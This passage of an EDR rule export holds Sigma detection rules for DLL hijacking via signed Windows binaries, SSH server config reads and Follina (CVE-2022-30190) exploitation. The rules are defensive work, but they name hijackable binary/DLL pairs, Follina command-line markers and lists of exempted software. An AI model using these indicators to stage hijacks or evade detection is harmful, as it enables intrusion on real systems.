ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bdabb0f7-6a9d-4c37-b933-69d36ad31f65",
"rule_name": "DLL Hijacking via bioiso.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bioiso.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be097f82-bcfe-4468-a438-3578b59b4187",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593085Z",
"creation_date": "2026-03-23T11:45:34.593088Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593096Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pinenrollmentbroker.yml",
"content": "title: DLL Hijacking via pinenrollmentbroker.exe\nid: be097f82-bcfe-4468-a438-3578b59b4187\ndescription: |\n Detects potential Windows DLL Hijacking via pinenrollmentbroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pinenrollmentbroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\PROPSYS.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be097f82-bcfe-4468-a438-3578b59b4187",
"rule_name": "DLL Hijacking via pinenrollmentbroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pinenrollmentbroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be199090-c1ac-4cbd-8c95-56a4e745b516",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.734331Z",
"creation_date": "2026-03-23T11:45:35.297413Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297418Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1563/001/",
"https://attack.mitre.org/techniques/T1484/"
],
"name": "t1021_004_ssh_server_config_read_linux.yml",
"content": "title: SSH Server Configuration Read\nid: be199090-c1ac-4cbd-8c95-56a4e745b516\ndescription: |\n Detects an attempt to read the content of the SSH server configuration file.\n The SSH server configuration contains the security settings used by SSH.\n An attacker can read the SSH server configuration to find weaknesses in them.\n It is recommended to investigate the process reading the configuration file.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path: '/etc/ssh/sshd_config'\n - TargetPath: '/etc/ssh/sshd_config'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '*/md5sum'\n - '*/sha1sum'\n - '*/sha256sum'\n - '*/lsattr'\n - '*/file'\n - '*/sum'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/rsync'\n - '/usr/bin/cp'\n - '/usr/bin/systemd-tmpfiles'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/bin/sed'\n - '/usr/bin/rpm'\n - '/usr/bin/git'\n - '/usr/bin/mksquashfs'\n - '/usr/bin/ssh-keygen'\n - '/sbin/ureadahead'\n - '/usr/sbin/ureadahead'\n - '/usr/bin/diff'\n - '/kaniko/executor'\n - '/usr/lib/x86_64-linux-gnu/openscap/probe_textfilecontent54'\n - '/bin/grep'\n - '/usr/bin/grep'\n\n exclusion_image:\n ProcessImage:\n - '/opt/chef/embedded/bin/ruby'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/usr/local/manageengine/uems_agent/bin/dctaskengine'\n - '/var/cfengine/bin/cf-agent'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/FortiEDRCollector/bin/FortiEDRCollector'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_sshd:\n - ProcessImage|endswith:\n - '/sshd'\n - '/sshd-socket-generator'\n - ProcessParentImage|endswith: '/sshd'\n\n exclusion_dpkg:\n - ProcessImage|endswith: '/dpkg'\n - ProcessParentImage|endswith: '/dpkg'\n - ProcessGrandparentImage|endswith: '/dpkg'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage|endswith: '/apt'\n - ProcessParentImage|endswith: '/apt'\n - ProcessGrandparentImage|endswith: '/apt'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/var/cache/debconf/tmp.ci/openssh-server.config.* configure'\n - ProcessParentCommandLine|contains: '/var/cache/debconf/tmp.ci/openssh-server.config.* configure'\n - ProcessGrandparentCommandLine|contains: '/var/cache/debconf/tmp.ci/openssh-server.config.* configure'\n\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf upgrade --refresh'\n\n exclusion_systemd_tempfiles:\n ProcessImage: '/usr/bin/systemd-tmpfiles'\n ProcessCommandLine: 'systemd-tmpfiles --clean'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n exclusion_eset:\n ProcessImage|startswith: '/opt/eset/'\n\n exclusion_puppet:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|contains: '/usr/bin/puppet agent'\n\n exclusion_fusioninventory:\n - ProcessName|startswith: 'fusioninventory-agent'\n - ProcessCommandLine|contains: 'fusioninventory-agent'\n\n exclusion_sosreport:\n ProcessCommandLine|startswith:\n - '/usr/bin/python* /usr/*bin/sosreport'\n - '/usr/libexec/platform-python* /usr/sbin/sosreport '\n\n exclusion_aide:\n ProcessImage|endswith: '/aide'\n\n exclusion_insights_client:\n - ProcessParentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n - ProcessGrandparentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n\n exclusion_dpkg_openssh:\n ProcessParentCommandLine|contains:\n - 'sh /var/lib/dpkg/info/openssh-server.config configure'\n - 'sh /tmp/openssh-server.config.?????? configure'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_glpi_agent:\n - ProcessImage: '/opt/glpi-agent/perl/*/bin/perl'\n - ProcessParentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - 'glpi-agent: running *'\n - ProcessGrandparentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - 'glpi-agent: running *'\n - ProcessCommandLine|contains:\n - '/usr/bin/perl /usr/bin/glpi-agent'\n - '/usr/bin/perl /usr/bin/glpi-inventory'\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_qualys2:\n # grep -Ei ^[[:blank:]]*UsePrivilegeSeparation[[:blank:]]*[[:blank:]] /etc/ssh/sshd_config\n # grep -Ei ^[[:blank:]]*UsePAM[[:blank:]]*[[:blank:]] /etc/ssh/sshd_config\n # grep -Ei ^[[:blank:]]*Subsystem[[:blank:]]*[[:blank:]] /etc/ssh/sshd_config\n # ...\n ProcessCommandLine:\n - 'grep -Ei ^[[:blank:]]\\**[[:blank:]]\\*[[:blank:]] /etc/ssh/sshd_config'\n - 'grep X11Forwarding yes /etc/ssh/sshd_config'\n ProcessParentImage:\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n ProcessGrandparentImage:\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n\n exclusion_mcafee:\n ProcessImage: '/opt/McAfee/ens/tp/bin/mfetpd'\n\n exclusion_bladelogic:\n ProcessGrandparentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_udscan:\n ProcessImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n\n exclusion_gitlab:\n - ProcessParentCommandLine|contains: '/opt/gitlab/embedded/bin/ruby /opt/gitlab/embedded/bin'\n - ProcessGrandparentCommandLine: '/bin/bash /opt/gitlab/bin/gitlab-ctl reconfigure'\n - ProcessGrandparentImage|startswith: '/opt/gitlab/embedded/bin/'\n\n exclusion_idataagent:\n ProcessImage:\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n\n exclusion_zabbix:\n ProcessImage: '/usr/sbin/zabbix_agent?'\n\n exclusion_deepinstinct:\n ProcessImage: '/opt/deepinstinct/bin/DeepManagementService'\n\n exclusion_wazuh:\n ProcessImage|endswith:\n - '/ossec/bin/wazuh-syscheckd'\n - '/ossec/bin/wazuh-modulesd'\n\n exclusion_newrelic:\n ProcessImage: '/usr/bin/newrelic-infra'\n\n exclusion_rudder:\n ProcessImage: '/opt/rudder/bin/cf-agent'\n\n exclusion_oscap:\n ProcessImage: '/usr/bin/oscap'\n ProcessCommandLine|startswith: 'oscap xccdf eval --profile '\n\n exclusion_packagekit:\n ProcessImage: '/usr/libexec/packagekitd'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_monit:\n ProcessImage: '/usr/bin/monit'\n\n exclusion_rkhunter:\n - ProcessParentCommandLine|contains: '/usr/bin/rkhunter '\n - ProcessGrandparentCommandLine|contains: '/usr/bin/rkhunter '\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_gc_worker:\n ProcessImage: '/opt/gc_service/gc/gc_worker'\n\n exclusion_microsoft_wdavdaemon:\n ProcessImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n\n exclusion_tanium:\n ProcessCommandLine|startswith:\n - '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n - '/opt/tanium/taniumclient/taniumclient '\n - '/opt/Tanium/TaniumClient/TaniumCX '\n\n exclusion_clamscan:\n ProcessImage: '/usr/bin/clamscan'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_socket_gen:\n ProcessImage: '/usr/lib/systemd/system-generators/sshd-socket-generator'\n\n exclusion_webmin:\n ProcessCommandLine|startswith: '/usr/bin/perl /usr/share/webmin/miniserv.pl'\n\n exclusion_docker:\n - ProcessImage: '/usr/bin/dockerd'\n - ProcessGrandparentImage: '/usr/bin/dockerd'\n\n exclusion_ds_agent:\n ProcessImage:\n - '/opt/ds_agent/ds_am'\n - '/opt/ds_agent/ds_agent'\n\n exclusion_palo:\n ProcessGrandparentImage: '/opt/traps/bin/pmd'\n\n exclusion_kalilab:\n ProcessCommandLine|contains: '/var/www/kalilab/'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_augtool:\n ProcessImage: '/usr/bin/augtool'\n\n exclusion_convert2rhel:\n ProcessCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_cloudinit:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /usr/bin/cloud-init '\n - '/usr/libexec/platform-python /usr/bin/cloud-init '\n\n exclusion_cyberwatch:\n ProcessCommandLine:\n - 'awk {IGNORECASE=1; if ($1~/^\\s*include$/) print $2} /etc/ssh/sshd_config'\n - 'awk {IGNORECASE=1; if ($1~/^\\s*match$/) print $0} /etc/ssh/sshd_config'\n\n exclusion_tripwire:\n ProcessCommandLine: '/usr/sbin/tripwire'\n\n exclusion_leapp:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /bin/leapp '\n - '/usr/libexec/platform-python /bin/leapp '\n\n exclusion_coin:\n ProcessCommandLine|startswith: '/usr/bin/python /usr/local/bin/coin '\n\n exclusion_facter:\n ProcessCommandLine|contains: '/usr/bin/ruby /usr/bin/facter'\n\n exclusion_networker:\n ProcessParentImage: '/usr/sbin/nsrexecd'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be199090-c1ac-4cbd-8c95-56a4e745b516",
"rule_name": "SSH Server Configuration Read",
"rule_description": "Detects an attempt to read the content of the SSH server configuration file.\nThe SSH server configuration contains the security settings used by SSH.\nAn attacker can read the SSH server configuration to find weaknesses in them.\nIt is recommended to investigate the process reading the configuration file.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1484",
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be284800-d1c8-4c56-a95c-c935a9a84f71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597214Z",
"creation_date": "2026-03-23T11:45:34.597217Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597229Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_relpost.yml",
"content": "title: DLL Hijacking via relpost.exe\nid: be284800-d1c8-4c56-a95c-c935a9a84f71\ndescription: |\n Detects potential Windows DLL Hijacking via relpost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'relpost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\ReAgent.dll'\n - '\\wer.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be284800-d1c8-4c56-a95c-c935a9a84f71",
"rule_name": "DLL Hijacking via relpost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via relpost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be303eba-4ffb-48f8-98da-8df78e6af4b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093556Z",
"creation_date": "2026-03-23T11:45:34.093558Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093562Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
"https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1566/"
],
"name": "t1104_office_application_spawning_msdt.yml",
"content": "title: Possible Follina CVE-2022-30190 Vulnerability Exploitation\nid: be303eba-4ffb-48f8-98da-8df78e6af4b7\ndescription: |\n Detects the possible exploitation of CVE-2022-30190 (aka Follina), a Microsoft Office code execution vulnerability that uses ms-msdt scheme to execute malicious code.\n Attackers can use Follina to execute code as part of their initial compromise by luring users into clicking on infected Office documents.\n It is recommended to analyze the opened Office document as well as to investigate processes stemming from the vulnerability exploitation.\nreferences:\n - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\n - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1566/\ndate: 2022/05/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - attack.initial_access\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.Follina\n - classification.Windows.Exploit.CVE-2022-30190\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\msdt.exe'\n - OriginalFileName: 'msdt.exe'\n selection_cmdline:\n CommandLine|contains|all:\n - 'IT_BrowseForFile'\n - '..?..?'\n selection_answerfile:\n CommandLine|contains:\n - ' /af '\n - ' -af '\n\n exclusion_networking:\n CommandLine|contains:\n - '-skip TRUE -path ?:\\windows\\diagnostics\\system\\networking -af ?:\\'\n - '-skip TRUE -path ??:\\windows\\diagnostics\\system\\networking? -af ??:\\'\n - ' -path ?:\\windows\\diagnostics\\system\\networking -skip force -af ?:\\'\n # C:\\WINDOWS\\system32\\msdt.exe -path C:\\WINDOWS\\diagnostics\\system\\networking -elev {E87F85D5-7427-4DF5-B36B-0317DA553142} -skip force -af C:\\Users\\xxxx\\AppData\\Local\\Temp\\NDF860E.tmp -ep NetworkDiagnosticsSharing -elevated yes\n # C:\\WINDOWS\\SysWOW64\\msdt.exe -path 